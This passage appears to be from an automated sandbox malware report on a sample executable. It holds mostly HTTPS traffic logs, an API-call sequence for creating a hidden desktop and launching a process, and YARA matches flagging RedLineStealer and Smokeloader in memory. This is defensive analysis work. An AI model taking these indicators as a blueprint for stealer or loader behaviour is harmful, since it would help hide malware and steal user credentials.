                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.5:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.5:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.5:49938 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49974 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49973 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.5:49989 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:50047 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50099 version: TLS 1.2
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_00409E30

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 00000000.00000002.2589608743.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C63B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C63B700
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C63B8C0 rand_s,NtQueryVirtualMemory,0_2_6C63B8C0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C63B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C63B910
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C5DF280
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5D35A00_2_6C5D35A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5E54400_2_6C5E5440
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C64545C0_2_6C64545C
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C64542B0_2_6C64542B
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C64AC000_2_6C64AC00
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C615C100_2_6C615C10
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C622C100_2_6C622C10
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5FD4D00_2_6C5FD4D0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C616CF00_2_6C616CF0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5E64C00_2_6C5E64C0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5DD4E00_2_6C5DD4E0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6334A00_2_6C6334A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C63C4A00_2_6C63C4A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5E6C800_2_6C5E6C80
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5FED100_2_6C5FED10
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5EFD000_2_6C5EFD00
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6005120_2_6C600512
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6385F00_2_6C6385F0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C610DD00_2_6C610DD0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C646E630_2_6C646E63
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5F9E500_2_6C5F9E50
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5F46400_2_6C5F4640
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C622E4E0_2_6C622E4E
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5DC6700_2_6C5DC670
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C613E500_2_6C613E50
